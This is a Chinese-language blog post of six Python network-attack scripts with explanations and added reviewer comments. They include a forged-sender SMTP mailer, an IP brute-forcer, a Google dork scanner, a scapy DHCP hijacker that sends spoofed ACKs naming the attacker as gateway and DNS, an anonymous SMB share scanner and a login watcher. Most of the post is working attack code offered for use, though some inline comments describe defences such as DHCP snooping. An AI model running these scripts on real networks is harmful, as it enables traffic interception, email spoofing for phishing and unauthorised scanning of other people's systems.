
[Python] Bargain Box Kung Fu

2015-12-03 16:35 846 查看
1.Spoofing E-mail Sender

这段代码需要用户在本地自建一个不对用户做认证的SMTP服务器。

源码为:

import socket

# Mail server to talk to: the listing assumes an SMTP service on the local
# host that accepts commands without authenticating the client.
HOST = 'localhost'
PORT = 25
# Envelope recipient used in the RCPT TO command below.
MAIL_TO = "someone@on_the_inter.net"

# Plain TCP connection to HOST:PORT; setblocking(0) switches the socket to
# non-blocking mode before connect().
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(0)
sock.connect((HOST,PORT))

# SMTP envelope: HELO, then MAIL FROM naming an arbitrary sender address.
# SMTP itself does not tie that address to the connecting host -- verifying it
# is the job of the receiving side (relay restrictions, SPF/DKIM/DMARC).
sock.send('HELO du.da')
sock.send('MAIL FROM: wweihnachtsmann@nordpol.net')
print repr(sock.recv(1024))   # dump whatever the server answered, verbatim

sock.send('RCPT TO:' + MAIL_TO)
print repr(sock.recv(1024))

# Message content.  In SMTP a line holding only '.' marks the end of DATA.
sock.send('DATA')
sock.send('Subject: Dein Wunschzettel')
sock.send('Selbstverstaendlich bekommst Du Dein Pony!')
sock.send('Mfg der Weihnachtsmann')
sock.send('.')
print repr(sock.recv(1024))

sock.send('QUIT')
print repr(sock.recv(1024))

sock.close()

2.IP Brute Forcer

当成功连接到一个网络,却缺少一个IP地址——DHCP不给你分配,也无法得知该网络的IP地址规划——这种情况下攻击者会尝试通过暴力猜解的方式得到一个IP。

此程序先配置网卡,然后再ping某个网段的网关;如果回复中含有“bytes from”,就说明我们得到了一个合法的IP地址。

源码为:

import os
import re
import sys
from random import randint

# Network interface that is reconfigured for every guess.
device = "wlan0"
# Candidate third octets for the 10.0.x.0/24 subnets tried below (1..253).
ips = range(1,254)

def ping_ip(ip):
    """Send one ICMP echo to *ip* via the system ``ping`` and stop on a reply.

    ``-c 1 -W 1``: a single probe with a one-second wait.  The command output
    is scanned for the literal text "bytes from"; on a hit the address is
    printed and the whole program exits with status 1, so the first subnet
    that answers ends the search.
    """
    fh = os.popen("ping -c 1 -W 1 " + ip)
    resp = fh.read()

    if re.search("bytes from", resp, re.MULTILINE):
        print "Got response from " + ip
        sys.exit(1)

# Try the candidate subnets in random order until the list is exhausted.
while len(ips) > 0:
    host_byte = randint(2,253)       # fourth octet of our own trial address
    idx = randint(0, len(ips)-1)
    ip = ips[idx]
    del ips[idx]                     # each third octet is used at most once

    print "Checking net 10.0." + str(ip) + ".0"
    # Put the trial address on the interface, then probe the two addresses
    # a gateway is usually found at (.1 and .254).
    cmd = "ifconfig " + device + str(ip) + "." + str(host_byte) + "up"
    os.system(cmd)
    ping_ip("10.0." + str(ip) + ".1")
    ping_ip("10.0." + str(ip) + ".254")
# Defender's view: a host using addresses the DHCP server never leased is what
# switch-side DHCP snooping with IP source guard, or 802.1X port authentication,
# is designed to stop; the burst of pings to .1/.254 across many subnets is also
# a simple pattern for network monitoring to alert on.


程序执行为:



3. Google-Hacks-Scanner

会用到google模块。先将要搜索的词保存在一个文件中(本例中为dic.txt),然后google.search()函数会利用谷歌进行搜索,之后通过re模块的正则表达式挑出谷歌搜索结果URL中带有“twitter”关键字的URL,并打印出来。

还有一点需要注意:如果搜索得过快,查询会被谷歌阻断。

源码:

import re
import sys
import google
import urllib2

# Usage: <script> <dict>  -- a text file with one search term per line.
if len(sys.argv) < 2:
    print sys.argv[0] + ": <dict>"
    sys.exit(1)

fh = open(sys.argv[1])

for word in fh.readlines():
    print "\nSearching for " + word.strip()
    # pause=5 makes the google module wait five seconds between requests;
    # faster querying gets the client blocked by Google.
    results = google.search(word.strip(),pause=5)

    try:
        # Print only result URLs that contain the substring "twitter".
        for link in results:
            if re.search("twitter", link): print link
    except KeyError:
        # NOTE(review): presumably raised inside the google module's result
        # parsing; the term is skipped silently -- TODO confirm the source.
        pass
    except urllib2.HTTPError, e:
        print "Google search failed: " + str(e)
程序运行过程:



4.DHCP Hijack

通过sniff函数捕获所有端口号为67的UDP包,随后检查该包是否是DHCP-Request,如果是,则构建一个假的DHCP-ACK包。

源码:

import sys
import getopt
import random
import scapy.all as scapy

dev = "eth0"                # interface to sniff and send on; -i overrides
gateway = None              # -g; defaults to dev's own address (set below)
nameserver = None           # -d; defaults to gateway
dhcpserver = None           # -s; defaults to gateway
client_net = "192.168.1."   # prefix of the addresses handed out in the forged ACK
# BPF filter for scapy.sniff().  Note: this name shadows the builtin filter().
filter = "udp port 67"

def handle_packet(packet):
    """sniff() callback: answer each DHCP Request with a forged DHCP ACK.

    Returns False without doing anything for frames that carry no DHCP layer.
    For message-type 3 (Request) it builds an ACK that names ``gateway`` as
    router, ``nameserver`` as DNS server and ``dhcpserver`` as the server
    address, and sends it out on ``dev``.

    Defender's view: DHCP carries no authentication a client could verify, so
    the countermeasure is on the network side -- DHCP snooping that trusts only
    the real server's switch port, plus alerting on DHCP OFFER/ACK frames
    sourced from any other MAC address.
    """
    eth = packet.getlayer(scapy.Ether)
    ip = packet.getlayer(scapy.IP)
    udp = packet.getlayer(scapy.UDP)
    bootp = packet.getlayer(scapy.BOOTP)
    dhcp = packet.getlayer(scapy.DHCP)
    dhcp_message_type = None

    if not dhcp:
        return False

    # DHCP options arrive as (name, value) tuples; extract the message type.
    for opt in dhcp.options:
        if opt[0] == "message-type":
            dhcp_message_type = opt[1]

    # message-type 3 = DHCP Request
    if dhcp_message_type == 3:
        client_ip = client_net + str(random.randint(2,254))

        # message-type 5 = DHCP ACK; Ethernet/UDP fields and the transaction id
        # (xid) are taken from the request so the reply is matched to it.
        dhcp_ack = scapy.Ether(src=eth.dst, dst=eth.src) / scapy.IP(src=dhcpserver, dst=client_ip) / scapy.UDP(sport=udp.dport,dport=udp.sport) / scapy.BOOTP(op=2, chaddr=eth.dst, siaddr=gateway, yiaddr=client_ip, xid=bootp.xid) / scapy.DHCP(options=[('message-type',5),('requested_addr',client_ip),('subnet_mask','255.255.255.0'),('router',gateway),('name_server',nameserver),('end')])

        print "Send spoofed DHCP ACK to %s" % ip.src
        scapy.sendp(dhcp_ack, iface=dev)

def usage():
    """Print the command-line synopsis and exit with status 1."""
    print sys.argv[0] + """
-d <dns_ip>
-g <gateway_ip>
-i <dev>
-s <dhcp_ip>"""
    sys.exit(1)

# Parse -d/-g/-i/-s; a malformed option list prints the usage text and exits.
try:
    cmd_opts = "d:g:i:s:"
    opts, args = getopt.getopt(sys.argv[1:], cmd_opts)
except getopt.GetoptError:
    usage()

for opt in opts:
    if opt[0] == "-i":
        dev = opt[1]
    elif opt[0] == "-g":
        gateway = opt[1]
    elif opt[0] == "-d":
        nameserver = opt[1]
    elif opt[0] == "-s":
        dhcpserver = opt[1]
    else:
        usage()

# Defaults: the sniffing host's own address on dev is advertised as gateway,
# and that address also serves as DNS and DHCP server unless given explicitly.
if not gateway:
    gateway = scapy.get_if_addr(dev)

if not nameserver:
    nameserver = gateway

if not dhcpserver:
    dhcpserver = gateway

print "Hijacking DHCP requests on %s" % (dev)
# Blocks indefinitely; handle_packet runs for every frame matching the filter.
scapy.sniff(iface=dev, filter=filter, prn=handle_packet)
程序运行过程:



捕获的数据包:



5.SMB-Share-Scanner

此代码是一个用于查找开放的SMB共享的简单扫描器。

首先利用函数get_ips()计算出IP范围,之后以随机顺序遍历所有IP地址,并调用外部命令smbclient,尝试列出所有无需认证即可访问的SMB共享。

源码:

import sys
import os
from random import randint

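def get_ips(start_ip, stop_ip):
    """Expand an inclusive dotted-quad range into a list of address strings.

    Args:
        start_ip: first address of the range, e.g. ``"10.0.0.1"``.
        stop_ip: last address of the range (inclusive).

    Returns:
        Every IPv4 address from *start_ip* up to and including *stop_ip*, in
        ascending order; an empty list when *start_ip* is numerically above
        *stop_ip*.

    Raises:
        ValueError: if either argument is not four decimal octets in 0..255.
    """
    def to_int(addr):
        # Dotted quad -> 32-bit integer.  Shifting octets in (instead of
        # concatenating "%02X" strings) means an octet outside 0..255 cannot
        # silently spill into its neighbour; it is rejected instead.
        octets = addr.split('.')
        if len(octets) != 4:
            raise ValueError("expected four octets: %r" % (addr,))
        value = 0
        for octet in octets:
            n = int(octet)
            if not 0 <= n <= 255:
                raise ValueError("octet out of range 0..255: %r" % (addr,))
            value = (value << 8) | n
        return value

    def to_str(value):
        # 32-bit integer -> dotted quad.
        return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))

    start_dec = to_int(start_ip)
    stop_dec = to_int(stop_ip)
    # stop_dec + 1 keeps the range inclusive, as the original "< stop + 1" loop did.
    return [to_str(n) for n in range(start_dec, stop_dec + 1)]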

def smb_share_scan(ip):
    """Run ``smbclient -N -L`` against *ip* and let its output reach the terminal.

    ``-N`` suppresses the password prompt, so any share listed here is
    reachable without credentials -- which, from the server owner's side, is
    the finding to act on (disable guest/anonymous listing).  The address is
    spliced into a shell command string, so only pass addresses the program
    generated itself.
    """
    os.system("smbclient -q -N -L" + ip)

# Usage: <script> <start_ip-stop_ip>; a single address is scanned directly.
if len(sys.argv) < 2:
    print sys.argv[0] + ": <start_ip-stop_ip>"
    sys.exit(1)
else:
    if sys.argv[1].find('-') > 0:
        start_ip, stop_ip = sys.argv[1].split("-")
        ips = get_ips(start_ip, stop_ip)

        # Walk the range in random order, removing each address once used.
        while len(ips) > 0:
            i = randint(0, len(ips)-1)
            lookup_ip = str(ips[i])
            del ips[i]
            smb_share_scan(lookup_ip)
    else:
        smb_share_scan(sys.argv[1])
程序运行过程:



6.Login Watcher

源码:

import os
import random
import re
import subprocess

import tailer

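# Log file followed for login events.
logfile = "/var/log/auth.log"
# Failed logins per user (remote ones are counted) before max_failed_cmd runs.
max_failed = 3
# NOTE(review): this halts the machine.  Since remote failures drive the
# counter, anyone who can reach the login service can trigger it with
# max_failed wrong passwords for a user name of their choosing -- i.e. a
# remote denial of service.  Consider a less drastic reaction.
max_failed_cmd = "/sbin/shutdown -h now"
# user name -> number of failed logins since the last successful one
failed_login = {}

# Raw strings: the patterns contain \d, \s and \( which are invalid escape
# sequences in ordinary string literals (DeprecationWarning since Python 3.6,
# SyntaxWarning from 3.12).  The regular expressions themselves are unchanged.
# Only the two "Failed/Accepted password" patterns define a ``host`` group.
success_patterns = [
    re.compile(r"Accepted password for (?P<user>.+?) from (?P<host>.+?) port"),
    re.compile(r"session opened for user (?P<user>.+?) by"),
]
failed_patterns = [
    re.compile(r"Failed password for (?P<user>.+?) from (?P<host>.+?) port"),
    re.compile(r"FAILED LOGIN (\(\d\)) on '(.+?)' FOR '(?P<user>.+?)'"),
    re.compile(r"authentication failure\;.+?user\=(?P<user>.+?)\s+.+?\s+user\=(.+)"),
]

# Spoken (via festival) right before max_failed_cmd is executed.
shutdown_msgs = [
    "Eat my shorts",
    "Follow the white rabbit",
    "System will explode in three seconds!",
    "Go home and leave me alone.",
    "Game... Over!",
]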

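def check_match(line, pattern, failed_login_check):
    """Match one log line against *pattern* and update the failure counters.

    Args:
        line: a single line read from the followed log file.
        pattern: a compiled regex.  Its named group ``user`` is read from the
            match; the ``host`` group is optional and not every pattern has it.
        failed_login_check: True when *pattern* comes from ``failed_patterns``,
            False when it comes from ``success_patterns``.

    Returns:
        True if *pattern* matched *line*, False otherwise.

    Side effects: speaks a status message through ``festival --tts``, updates
    the module-level ``failed_login`` counter and, once a user's count reaches
    ``max_failed``, runs ``max_failed_cmd``.
    """
    match = pattern.search(line)
    if match is None:
        return False

    groups = match.groupdict()
    user = groups.get('user')
    # groupdict() yields None for a group the pattern does not define, where
    # match.group('host') would raise IndexError for the host-less patterns.
    host = groups.get('host')
    failed_login.setdefault(user, 0)

    # Both user and host are copied from the log line, and the user name is
    # chosen by whoever attempted the login -- treat them as untrusted data
    # and never interpolate them into a shell command (see _speak).
    if host is not None and failed_login_check:
        # Remote login failed
        _speak("Login for user " + user + " from host " + host + " failed!")
        failed_login[user] += 1
    elif host is not None and not failed_login_check:
        # Remote login successful
        _speak("User " + user + " logged in from host " + host)
        failed_login[user] = 0
    elif user != "CRON" and not failed_login_check:
        # Local login successful
        _speak("User " + user + " logged in")
        failed_login[user] = 0
    # NOTE(review): a local *failed* login (host-less pattern with
    # failed_login_check=True) reaches no branch and is therefore not counted;
    # kept as in the original, confirm whether that is intended.

    # Too many failed logins?
    if failed_login[user] >= max_failed:
        _speak(random.choice(shutdown_msgs))
        os.system(max_failed_cmd)

    return True


def _speak(message):
    """Read *message* aloud via ``festival --tts``.

    The text is written to festival's stdin instead of being embedded in an
    ``echo '...' | festival`` shell string, so a user name or host containing
    shell metacharacters (a single quote is enough) cannot run commands as the
    watcher's user.  If festival is not installed the message is printed.
    """
    data = message if isinstance(message, bytes) else message.encode("utf-8")
    try:
        proc = subprocess.Popen(["festival", "--tts"], stdin=subprocess.PIPE)
    except OSError:
        # Speech is only a notification; keep watching the log without it.
        print(message)
        return
    proc.communicate(data)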

# Follow the log like ``tail -f``.  Failure patterns are tried first and the
# first pattern that matches a line wins; success patterns are consulted only
# when no failure pattern matched.
for line in tailer.follow(open(logfile)):
    # any() stops at the first True, which mirrors the original ``break``.
    if not any(check_match(line, failed, True) for failed in failed_patterns):
        for success in success_patterns:
            if check_match(line, success, False):
                break